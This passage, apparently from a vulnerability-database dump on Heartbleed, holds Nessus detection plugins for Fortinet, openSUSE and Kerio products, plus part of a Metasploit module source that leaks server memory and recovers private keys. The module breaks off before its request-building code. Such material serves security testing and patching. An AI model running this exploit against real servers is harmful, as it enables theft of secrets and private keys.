value:\"cpe:/o:fortinet:fortios\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"fortinet_version.nbin\");\n script_require_keys(\"Host/Fortigate/model\", \"Host/Fortigate/version\", \"Host/Fortigate/build\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nmodel = get_kb_item_or_exit(\"Host/Fortigate/model\");\nversion = get_kb_item_or_exit(\"Host/Fortigate/version\");\nbuild = get_kb_item_or_exit(\"Host/Fortigate/build\");\n\n# FortiOS check.\nif (preg(string:model, pattern:\"forti(gate|wifi)\", icase:TRUE))\n{\n # Only 5.x is affected.\n if (version =~ \"^5\\.\") fix = \"5.0.7\";\n}\n# FortiMail Check\nelse if (preg(string:model, pattern:\"fortimail\", icase:TRUE))\n{\n # Only 4.3.x and 5.x are affected.\n if (version =~ \"^4\\.3\\.\") fix = \"4.3.7\";\n else if (version =~ \"^5\\.0\\.\") fix = \"5.0.5\";\n else if (version =~ \"^5\\.1\\.\") fix = \"5.1.2\";\n}\n# FortiRecorder Check, all affected.\nelse if (preg(string:model, pattern:\"fortirecorder\", icase:TRUE))\n{\n fix = \"1.4.1\";\n}\n# FortiVoice check, specific models affected.\nelse if (preg(string:model, pattern:\"fortivoice-(200d|vm)\", icase:TRUE))\n{\n fix = \"3.0.1\";\n}\n# FortiADC, specific models and versions affected.\nelse if (preg(string:model, pattern:\"fortiadc\", icase:TRUE))\n{\n if (model =~ \"E$\" && version =~ \"^3\\.\") fix = \"3.2.3\";\n else if (model =~ \"-(15|20|40)00D$\") fix = \"3.2.2\";\n}\n# FortiDDOS B-Series affected.\nelse if (preg(string:model, pattern:\"fortiddos-\\d+B\", icase:TRUE))\n{\n fix = \"4.0.1\";\n}\n\nif (fix && ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n port = 0;\n if (report_verbosity > 0)\n {\n report =\n '\\n Model : ' + model +\n '\\n Version : ' + version +\n '\\n Fixed Version: ' + fix +\n '\\n';\n\n security_warning(extra:report, port:port);\n }\n else security_warning(port:port);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, model, version);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-13T08:15:52", "bulletinFamily": "scanner", "description": "This openssl update fixes one security issue :\n\n - bnc#872299: Fixed missing bounds checks for heartbeat\n messages (CVE-2014-0160).", "modified": "2019-12-02T00:00:00", "id": "OPENSUSE-2014-277.NASL", "href": "https://www.tenable.com/plugins/nessus/75314", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : openssl (openSUSE-SU-2014:0492-1) (Heartbleed)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-277.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75314);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n\n script_name(english:\"openSUSE Security Update : openssl (openSUSE-SU-2014:0492-1) (Heartbleed)\");\n script_summary(english:\"Check for the openSUSE-2014-277 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This openssl update fixes one security issue :\n\n - bnc#872299: Fixed missing bounds checks for heartbeat\n messages (CVE-2014-0160).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=872299\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-04/msg00015.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl1_0_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl1_0_0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl1_0_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl1_0_0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libopenssl-devel-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libopenssl1_0_0-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libopenssl1_0_0-debuginfo-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"openssl-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"openssl-debuginfo-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"openssl-debugsource-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libopenssl-devel-32bit-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libopenssl1_0_0-32bit-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libopenssl1_0_0-debuginfo-32bit-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libopenssl-devel-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libopenssl1_0_0-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libopenssl1_0_0-debuginfo-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openssl-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openssl-debuginfo-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openssl-debugsource-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libopenssl-devel-32bit-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libopenssl1_0_0-32bit-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libopenssl1_0_0-debuginfo-32bit-1.0.1e-11.32.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libopenssl-devel / libopenssl-devel-32bit / libopenssl1_0_0 / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-13T07:52:01", "bulletinFamily": "scanner", "description": "According to its banner, the remote host is running a version of Kerio\nConnect (formerly Kerio MailServer) version 8.2.x prior to 8.2.4. It\nis, therefore, affected by an out-of-bounds read error, known as the\n", "modified": "2019-12-02T00:00:00", "id": "KERIO_CONNECT_824.NASL", "href": "https://www.tenable.com/plugins/nessus/76402", "published": "2014-07-08T00:00:00", "title": "Kerio Connect 8.2.x < 8.2.4 Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76402);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"Kerio Connect 8.2.x < 8.2.4 Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks the Kerio Connect version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote mail server is affected by the Heartbleed vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the remote host is running a version of Kerio\nConnect (formerly Kerio MailServer) version 8.2.x prior to 8.2.4. It\nis, therefore, affected by an out-of-bounds read error, known as the\n'Heartbleed Bug' in the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content. Note\nthis affects both client and server modes of operation.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # http://kb.kerio.com/product/kerio-operator/openssl-vulnerability-cve-2014-0160-heartbleed-1585.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0e9520d1\");\n # http://www.kerio.com/support/kerio-connect/release-history-older\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8ac0f693\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Kerio Connect 8.2.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:kerio:connect\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"kerio_kms_641.nasl\", \"kerio_mailserver_admin_port.nasl\");\n script_require_keys(\"kerio/port\");\n script_require_ports(\"Services/kerio_mailserver_admin\", 25, 465, 587);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_kb_item_or_exit('kerio/port');\nver = get_kb_item_or_exit('kerio/'+port+'/version');\ndisplay_ver = get_kb_item_or_exit('kerio/'+port+'/display_version');\n\n# Versions prior to 7 are called MailServer; versions after are called Connect\nif (ver =~ '^[0-6]\\\\.') product = \"Kerio MailServer\";\nelse product = \"Kerio Connect\";\n\nfixed_version = \"8.2.4\";\nif (\n ver =~ \"^8\\.2\\.\" &&\n ver_compare(ver:ver, fix:fixed_version, strict:FALSE) == -1\n)\n{\n if (report_verbosity)\n {\n report =\n '\\n Product : ' + product +\n '\\n Installed version : ' + display_ver +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\n\naudit(AUDIT_LISTEN_NOT_VULN, product, port, display_ver);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "metasploit": [{"lastseen": "2019-11-23T02:34:35", "bulletinFamily": "exploit", "description": "This module implements the OpenSSL Heartbleed attack. The problem exists in the handling of heartbeat requests, where a fake length can be used to leak memory data in the response. Services that support STARTTLS may also be vulnerable. The module supports several actions, allowing for scanning, dumping of memory contents to loot, and private key recovery. The LEAK_COUNT option can be used to specify leaks per SCAN or DUMP. The repeat command can be used to make running the SCAN or DUMP many times more powerful. As in: repeat -t 60 run; sleep 2 To run every two seconds for one minute.\n", "modified": "2018-11-16T18:18:28", "published": "2014-04-18T13:16:28", "id": "MSF:AUXILIARY/SCANNER/SSL/OPENSSL_HEARTBLEED", "href": "", "type": "metasploit", "title": "OpenSSL Heartbeat (Heartbleed) Information Leak", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# TODO: Connection reuse: Only connect once and send subsequent heartbleed requests.\n# We tried it once in https://github.com/rapid7/metasploit-framework/pull/3300\n# but there were too many errors\n# TODO: Parse the rest of the server responses and return a hash with the data\n# TODO: Extract the relevant functions and include them in the framework\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n CIPHER_SUITES = [\n 0xc014, # TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA\n 0xc00a, # TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA\n 0xc022, # TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA\n 0xc021, # TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA\n 0x0039, # TLS_DHE_RSA_WITH_AES_256_CBC_SHA\n 0x0038, # TLS_DHE_DSS_WITH_AES_256_CBC_SHA\n 0x0088, # TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA\n 0x0087, # TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA\n 0x0087, # TLS_ECDH_RSA_WITH_AES_256_CBC_SHA\n 0xc00f, # TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA\n 0x0035, # TLS_RSA_WITH_AES_256_CBC_SHA\n 0x0084, # TLS_RSA_WITH_CAMELLIA_256_CBC_SHA\n 0xc012, # TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA\n 0xc008, # TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA\n 0xc01c, # TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA\n 0xc01b, # TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA\n 0x0016, # TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA\n 0x0013, # TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA\n 0xc00d, # TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA\n 0xc003, # TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA\n 0x000a, # TLS_RSA_WITH_3DES_EDE_CBC_SHA\n 0xc013, # TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA\n 0xc009, # TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA\n 0xc01f, # TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA\n 0xc01e, # TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA\n 0x0033, # TLS_DHE_RSA_WITH_AES_128_CBC_SHA\n 0x0032, # TLS_DHE_DSS_WITH_AES_128_CBC_SHA\n 0x009a, # TLS_DHE_RSA_WITH_SEED_CBC_SHA\n 0x0099, # TLS_DHE_DSS_WITH_SEED_CBC_SHA\n 0x0045, # TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA\n 0x0044, # TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA\n 0xc00e, # TLS_ECDH_RSA_WITH_AES_128_CBC_SHA\n 0xc004, # TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA\n 0x002f, # TLS_RSA_WITH_AES_128_CBC_SHA\n 0x0096, # TLS_RSA_WITH_SEED_CBC_SHA\n 0x0041, # TLS_RSA_WITH_CAMELLIA_128_CBC_SHA\n 0xc011, # TLS_ECDHE_RSA_WITH_RC4_128_SHA\n 0xc007, # TLS_ECDHE_ECDSA_WITH_RC4_128_SHA\n 0xc00c, # TLS_ECDH_RSA_WITH_RC4_128_SHA\n 0xc002, # TLS_ECDH_ECDSA_WITH_RC4_128_SHA\n 0x0005, # TLS_RSA_WITH_RC4_128_SHA\n 0x0004, # TLS_RSA_WITH_RC4_128_MD5\n 0x0015, # TLS_DHE_RSA_WITH_DES_CBC_SHA\n 0x0012, # TLS_DHE_DSS_WITH_DES_CBC_SHA\n 0x0009, # TLS_RSA_WITH_DES_CBC_SHA\n 0x0014, # TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA\n 0x0011, # TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA\n 0x0008, # TLS_RSA_EXPORT_WITH_DES40_CBC_SHA\n 0x0006, # TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5\n 0x0003, # TLS_RSA_EXPORT_WITH_RC4_40_MD5\n 0x00ff # Unknown\n ]\n\n SSL_RECORD_HEADER_SIZE = 0x05\n HANDSHAKE_RECORD_TYPE = 0x16\n HEARTBEAT_RECORD_TYPE = 0x18\n ALERT_RECORD_TYPE = 0x15\n HANDSHAKE_SERVER_HELLO_TYPE = 0x02\n HANDSHAKE_CERTIFICATE_TYPE = 0x0b\n HANDSHAKE_KEY_EXCHANGE_TYPE = 0x0c\n HANDSHAKE_SERVER_HELLO_DONE_TYPE = 0x0e\n\n TLS_VERSION = {\n 'SSLv3' => 0x0300,\n '1.0' => 0x0301,\n '1.1' => 0x0302,\n '1.2' => 0x0303\n }\n\n TLS_CALLBACKS = {\n 'SMTP' => :tls_smtp,\n 'IMAP' => :tls_imap,\n 'JABBER' => :tls_jabber,\n 'POP3' => :tls_pop3,\n 'FTP' => :tls_ftp,\n 'POSTGRES' => :tls_postgres\n }\n\n # See the discussion at https://github.com/rapid7/metasploit-framework/pull/3252\n SAFE_CHECK_MAX_RECORD_LENGTH = (1 << 14)\n\n # For verbose output, deduplicate repeated characters beyond this threshold\n DEDUP_REPEATED_CHARS_THRESHOLD = 400\n\n def initialize\n super(\n 'Name' => 'OpenSSL Heartbeat (Heartbleed) Information Leak',\n 'Description' => %q{\n This module implements the OpenSSL Heartbleed attack. The problem\n exists in the handling of heartbeat requests, where a fake length can\n be used to leak memory data in the response. Services that support\n STARTTLS may also be vulnerable.\n\n The module supports several actions, allowing for scanning, dumping of\n memory contents to loot, and private key recovery.\n\n The LEAK_COUNT option can be used to specify leaks per SCAN or DUMP.\n\n The repeat command can be used to make running the SCAN or DUMP many\n times more powerful. As in:\n repeat -t 60 run; sleep 2\n To run every two seconds for one minute.\n },\n 'Author' => [\n 'Neel Mehta', # Vulnerability discovery\n 'Riku', # Vulnerability discovery\n 'Antti', # Vulnerability discovery\n 'Matti', # Vulnerability discovery\n 'Jared Stafford <jspenguin[at]jspenguin.org>', # Original Proof of Concept. This module is based on it.\n 'FiloSottile', # PoC site and tool\n 'Christian Mehlmauer', # Msf module\n 'wvu', # Metasploit module\n 'juan vazquez', # Metasploit module\n 'Sebastiano Di Paola', # Msf module\n 'Tom Sellers', # Metasploit module\n 'jjarmoc', # Metasploit module; keydump, refactoring..\n 'Ben Buchanan', #Metasploit module\n 'herself' #Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2014-0160' ],\n [ 'US-CERT-VU', '720951' ],\n [ 'URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A' ],\n [ 'URL', 'http://heartbleed.com/' ],\n [ 'URL', 'https://github.com/FiloSottile/Heartbleed' ],\n [ 'URL', 'https://gist.github.com/takeshixx/10107280' ],\n [ 'URL', 'http://filippo.io/Heartbleed/' ]\n ],\n 'DisclosureDate' => '2014-04-07',\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n ['SCAN', {'Description' => 'Check hosts for vulnerability'}],\n ['DUMP', {'Description' => 'Dump memory contents to loot'}],\n ['KEYS', {'Description' => 'Recover private keys from memory'}]\n ],\n 'DefaultAction' => 'SCAN',\n 'Notes' =>\n {\n 'AKA' => ['Heartbleed']\n }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptEnum.new('TLS_CALLBACK', [true, 'Protocol to use, \"None\" to use raw TLS sockets', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP', 'POSTGRES' ]]),\n OptEnum.new('TLS_VERSION', [true, 'TLS/SSL version to use', '1.0', ['SSLv3','1.0', '1.1', '1.2']]),\n OptInt.new('MAX_KEYTRIES', [true, 'Max tries to dump key', 50]),\n OptInt.new('STATUS_EVERY', [true, 'How many retries until key dump status', 5]),\n OptRegexp.new('DUMPFILTER', [false, 'Pattern to filter leaked memory before storing', nil]),\n OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]),\n OptInt.new('LEAK_COUNT', [true, 'Number of times to leak memory per SCAN or DUMP invocation', 1])\n ])\n\n register_advanced_options(\n [\n OptInt.new('HEARTBEAT_LENGTH', [true, 'Heartbeat length', 65535]),\n OptString.new('XMPPDOMAIN', [true, 'The XMPP Domain to use when Jabber is selected', 'localhost'])\n ])\n\n end\n\n #\n # Main methods\n #\n\n # Called when using check\n def check_host(ip)\n @check_only = true\n vprint_status \"Checking for Heartbleed exposure\"\n if bleed\n Exploit::CheckCode::Appears\n else\n Exploit::CheckCode::Safe\n end\n end\n\n # Main method\n def run\n if heartbeat_length > 65535 || heartbeat_length < 0\n print_error('HEARTBEAT_LENGTH should be a natural number less than 65536')\n return\n end\n\n if response_timeout < 0\n print_error('RESPONSE_TIMEOUT should be bigger than 0')\n return\n end\n\n super\n end\n\n # Main method\n def run_host(ip)\n case action.name\n # SCAN and DUMP are similar, but DUMP stores loot\n when 'SCAN', 'DUMP'\n # 'Tis but a scratch\n bleeded = ''\n\n 1.upto(leak_count) do |count|\n vprint_status(\"Leaking heartbeat response ##{count}\")\n bleeded << bleed.to_s\n end\n\n loot_and_report(bleeded)\n when 'KEYS'\n get_keys\n else\n # Shouldn't get here, since Action is Enum\n print_error(\"Unknown Action: #{action.name}\")\n end\n\n # ensure all connections are closed\n disconnect\n end\n\n #\n # DATASTORE values\n #\n\n # If this is merely a check, set to the RFC-defined\n # maximum padding length of 2^14. See:\n # https://tools.ietf.org/html/rfc6520#section-4\n # https://github.com/rapid7/metasploit-framework/pull/3252\n def heartbeat_length\n if @check_only\n SAFE_CHECK_MAX_RECORD_LENGTH\n else\n datastore['HEARTBEAT_LENGTH']\n end\n end\n\n def response_timeout\n datastore['RESPONSE_TIMEOUT']\n end\n\n def tls_version\n datastore['TLS_VERSION']\n end\n\n def dumpfilter\n datastore['DUMPFILTER']\n end\n\n def max_keytries\n datastore['MAX_KEYTRIES']\n end\n\n def xmpp_domain\n datastore['XMPPDOMAIN']\n end\n\n def status_every\n datastore['STATUS_EVERY']\n end\n\n def tls_callback\n datastore['TLS_CALLBACK']\n end\n\n def leak_count\n datastore['LEAK_COUNT']\n end\n\n #\n # TLS Callbacks\n #\n\n def tls_smtp\n # https://tools.ietf.org/html/rfc3207\n get_data\n sock.put(\"EHLO #{Rex::Text.rand_text_alpha(10)}\\r\\n\")\n res = get_data\n\n unless res && res =~ /STARTTLS/\n return nil\n end\n sock.put(\"STARTTLS\\r\\n\")\n get_data\n end\n\n def tls_imap\n # http://tools.ietf.org/html/rfc2595\n get_data\n sock.put(\"a001 CAPABILITY\\r\\n\")\n res = get_data\n unless res && res =~ /STARTTLS/i\n return nil\n end\n sock.put(\"a002 STARTTLS\\r\\n\")\n get_data\n end\n\n def tls_postgres\n # postgresql TLS - works with all modern pgsql versions - 8.0 - 9.3\n # http://www.postgresql.org/docs/9.3/static/protocol-message-formats.html\n get_data\n # the postgres SSLRequest packet is a int32(8) followed by a int16(1234),\n # int16(5679) in network format\n psql_sslrequest = [8].pack('N')\n psql_sslrequest << [1234, 5679].pack('n*')\n sock.put(psql_sslrequest)\n res = get_data\n unless res && res =~ /S/\n return nil\n end\n res\n end\n\n def tls_pop3\n # http://tools.ietf.org/html/rfc2595\n get_data\n sock.put(\"CAPA\\r\\n\")\n res = get_data\n if res.nil? || res =~ /^-/ || res !~ /STLS/\n return nil\n end\n sock.put(\"STLS\\r\\n\")\n res = get_data\n if res.nil? || res =~ /^-/\n return nil\n end\n res\n end\n\n def jabber_connect_msg(hostname)\n # http://xmpp.org/extensions/xep-0035.html\n msg = \"<stream:stream xmlns='jabber:client' \"\n msg << \"xmlns:stream='http://etherx.jabber.org/streams' \"\n msg << \"version='1.0' \"\n msg << \"to='#{hostname}'>\"\n end\n\n def tls_jabber\n sock.put(jabber_connect_msg(xmpp_domain))\n res = get_data\n if res && res.include?('host-unknown')\n jabber_host = res.match(/ from='([\\w.]*)' /)\n if jabber_host && jabber_host[1]\n disconnect\n establish_connect\n vprint_status(\"Connecting with autodetected remote XMPP hostname: #{jabber_host[1]}...\")\n sock.put(jabber_connect_msg(jabber_host[1]))\n res = get_data\n end\n end\n if res.nil? || res.include?('stream:error') || res !~ /<starttls xmlns=['\"]urn:ietf:params:xml:ns:xmpp-tls['\"]/\n vprint_error(\"Jabber host unknown. Please try changing the XMPPDOMAIN option.\") if res && res.include?('host-unknown')\n return nil\n end\n msg = \"<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\"\n sock.put(msg)\n res = get_data\n return nil if res.nil? || !res.include?('<proceed')\n res\n end\n\n def tls_ftp\n # http://tools.ietf.org/html/rfc4217\n res = get_data\n return nil if res.nil?\n sock.put(\"AUTH TLS\\r\\n\")\n res = get_data\n return nil if res.nil?\n if res !~ /^234/\n # res contains the error message\n vprint_error(\"FTP error: #{res.strip}\")\n return nil\n end\n res\n end\n\n #\n # Helper Methods\n #\n\n # Get data from the socket\n # this ensures the requested length is read (if available)\n def get_data(length = -1)\n to_receive = length\n data = ''\n done = false\n while done == false\n begin\n temp = sock.get_once(to_receive, response_timeout)\n rescue EOFError\n break\n end\n\n break if temp.nil?\n\n data << temp\n if length != -1\n to_receive -= temp.length\n done = true if to_receive <= 0\n end\n end\n\n data\n end\n\n def to_hex_string(data)\n data.each_byte.map { |b| sprintf('%02X ', b) }.join.strip\n end\n\n # establishes a connect and parses the server response\n def 